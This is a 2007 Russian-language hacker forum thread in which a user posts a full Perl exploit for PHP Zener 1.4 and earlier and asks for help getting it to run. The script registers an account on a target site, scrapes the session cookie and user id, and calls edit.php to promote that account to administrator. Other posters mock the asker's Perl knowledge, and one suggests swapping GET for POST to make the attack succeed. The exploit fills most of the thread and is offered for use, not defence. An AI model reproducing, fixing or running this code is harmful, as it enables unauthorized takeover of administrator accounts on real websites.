Помогите править сплоит на Perle
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите править сплоит на Perle - 2007-02-13 09:55:41.673333
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
#!/usr/bin/perl use IO::SOCKET; # ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ # PHP Zener <=1.4 get user-admin exploit # DSS[TeaM] // www.dss.jino-net.ru # Write by DoSiS # ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ # usage: # perl zener.pl http://$serv"; $path .= $fold; $path .= 'register.php?isok=yes&name='; $path .= $login; $path .= '&pass='; $path .= $pass; $path .= '&email_=dss@dss.dss'; print $socket "GET $path HTTP/1.0\r\n\r\n"; @ans = <$socket>; foreach $_ (@ans) { if (/Set-Cookie/) { $ses = substr($_,22,32); }} $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "$socket error connect!"; $path = "http://$serv"; $path .= $fold; $path .= 'index.php?page=inf_red.php'; print "[ + ] get id number\n"; print $socket "GET $path HTTP/1.0\n"; print $socket "Cookie: PHPSESSID=$ses\r\n\r\n"; @ans = <$socket>; foreach $_ (@ans) { if (/name=\"ed\"/) { $ed = substr($_,38); }} if ($ed eq "") { print "[ - ] change your user name\n"; exit;} if ($ed=~/\r\n/) { $ed =~ s/">\r\n//g; } else { $ed =~ s/">\n//g; } $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "$socket error connect!"; $path = "http://$serv"; $path .= $fold; $path .= 'edit.php?ed='; $path .= $ed; $path .= '&stat=admin&pass_='; $path .= $pass; $path .= '&email_=dss@dss.dss'; print "[ + ] edit user on admin\n"; print $socket "GET $path HTTP/1.0\n"; print $socket "Cookie: PHPSESSID=$ses\r\n\r\n"; print "[ + ] mission complete\n"; sub info() { print q(############################################################ PHP Zener <=1.4 get user-admin exploit DSS[TeaM] // www.dss.jino-net.ru Write by DoSiS ############################################################ usage: perl zener.pl [dir] [user] [pass] ############################################################ ); exit; } скомпилил ++++++++++++++++++++++++++++++++++++++++++++++++ после get iв number вместо mission complet пишет : change your user name. нужно изменить имя помагите в перле не силён "> [dir] [user] [pass] # ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ if (@ARGV < 4) { info(); } $serv=$ARGV[0]; $fold=$ARGV[1]; $login=$ARGV[2]; $pass=$ARGV[3]; print "[ + ] connecting…\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "$socket error connect!"; print "[ + ] registration user\n"; $path = "http://$serv"; $path .= $fold; $path .= 'register.php?isok=yes&name='; $path .= $login; $path .= '&pass='; $path .= $pass; $path .= '&email_=dss@dss.dss'; print $socket "GET $path HTTP/1.0\r\n\r\n"; @ans = <$socket>; foreach $_ (@ans) { if (/Set-Cookie/) { $ses = substr($_,22,32); }} $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "$socket error connect!"; $path = "http://$serv"; $path .= $fold; $path .= 'index.php?page=inf_red.php'; print "[ + ] get id number\n"; print $socket "GET $path HTTP/1.0\n"; print $socket "Cookie: PHPSESSID=$ses\r\n\r\n"; @ans = <$socket>; foreach $_ (@ans) { if (/name=\"ed\"/) { $ed = substr($_,38); }} if ($ed eq "") { print "[ - ] change your user name\n"; exit;} if ($ed=~/\r\n/) { $ed =~ s/">\r\n//g; } else { $ed =~ s/">\n//g; } $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "$socket error connect!"; $path = "http://$serv"; $path .= $fold; $path .= 'edit.php?ed='; $path .= $ed; $path .= '&stat=admin&pass_='; $path .= $pass; $path .= '&email_=dss@dss.dss'; print "[ + ] edit user on admin\n"; print $socket "GET $path HTTP/1.0\n"; print $socket "Cookie: PHPSESSID=$ses\r\n\r\n"; print "[ + ] mission complete\n"; sub info() { print q(############################################################ PHP Zener <=1.4 get user-admin exploit DSS[TeaM] // www.dss.jino-net.ru Write by DoSiS ############################################################ usage: perl zener.pl [dir] [user] [pass] ############################################################ ); exit; } скомпилил ++++++++++++++++++++++++++++++++++++++++++++++++ после get iв number вместо mission complet пишет : change your user name. нужно изменить имя помагите в перле не силён
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 10:31:24.136666
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
ну што некто не поможет ???
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 17:48:00.130000
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
change your user name.
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 18:03:25.350000
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
Я бы вот это вырезал для начала: quote:
if ($ed eq "") { print "[ - ] change your user name\n"; exit;}
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 18:07:53.403333
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
quote:
ORIGINAL: -=lebed=- Я бы вот это вырезал для начала: quote:
if ($ed eq "") { print "[ - ] change your user name\n"; exit;} Бгг )) Дык можно ваще весь скрипт закомментировать, он и не пикнет.
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 19:15:27.290000
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Походу, данный юзер просто не зареган в системе.
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 21:19:49.573333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Вы читайте внимательней он его СКОМПИЛИЛ !!![sm=bj.gif]
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 21:57:46.960000
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
quote:
ORIGINAL: blonx Вы читайте внимательней он его СКОМПИЛИЛ !!![sm=bj.gif] А что? Есть ксати проги, делающие из программы под интерпретатор Perl`а исполняемый exeшник… Так что некуя так заливаться http://www.indigostar.com/perl2exe.htm
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-14 11:01:11.526666
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
blonx А как по твоему запускаются Перл проги? Не компелируясь? :) Они тож компилятся, только в оперативную память и в контексте интерпритатора Перл.
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-14 11:16:34.760000
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Бедная оперативная память. Фигово наверное, когда в тебя всё время компилируют.. да ещё и интерпретатор в контексте.
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-15 08:39:08.353333
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
всёровно ругается подскажите по подробней с конфигурацией ……….. :)
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-15 11:38:00.543333
|
|
|
halkfild
Сообщений: 286
Оценки: 0
Присоединился: 2006-11-27 18:26:36.310000
|
программы на perl не компилятся а интерпретируются.. читай начало скрипта.. quote:
change your user name. 8| это выдает после проверки аутентификации.. значит смотри даные пользователя…
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-15 20:08:06.516666
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
А как по твоему запускаются Перл проги? Не компелируясь? :) Они тож компилятся, только в оперативную память и в контексте интерпритатора Перл. В данном случае слово "скомпилил" свучит как си бемоль из третьей симфонии Баха. Если уж на то пошло дело правильнее было бы написать "запустил". И вообще мне кажиться что прежде чем задавать такие вопросы, нужно подштудировать маленько и знать, какой язык является компилируемым, а какой интерпретируемым, а если чел даже этих основ не знает, то какого он вообще собрался программировать? И толку, что ты ему щас по поводу данного скрипта посоветуешь, ему все равно нужно все по полкам разложить и дать готовый результат.
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-16 04:55:36.130000
|
|
|
atoll
Сообщений: 21
Оценки: 0
Присоединился: 2007-02-07 01:17:57.076666
|
Не проще было подсказать ему?Чем отправлять учиться.Если он не знает перл это не значит что он ничего не знает Выучит и перл со временем. Latika тебе правильно почти подсказали.И понятно и без перл почему скрипт не работает - "GET $path HTTP/1.0\n";Выполнение этого запроса отключено и этот скрипт будет работать но там где они разрешены. а так как здесь не обрабатывается проверка то скрипт получив"" - пустую строкуf ($ed eq "") отрабатывает на выход с мессагой Есть вариант заменить вместо GET - POST запрос.Но возможно придется доработать скрипт. В принципе ты справишся сам.В гугле полно туториалов по этой теме и перл здесь не причем.Вот тебе один линк http://forum.zloy.org/showthread.php?t=8937 куда я набрел случайно и как раз для тебя короткий тутор по сокетам и все разжевано.И у тебя все получиться. print "[ + ] get id number\n"; print $socket "POST $path HTTP/1.0\n"; …………………………………………. if ($ed eq "") { print "[ - ] change your user name\n"; exit;}
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-16 05:16:15.196666
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
Спасибо атолл буду пробывать если взять кусок бумаги што то там краски и клей :)
|
|
|
|
|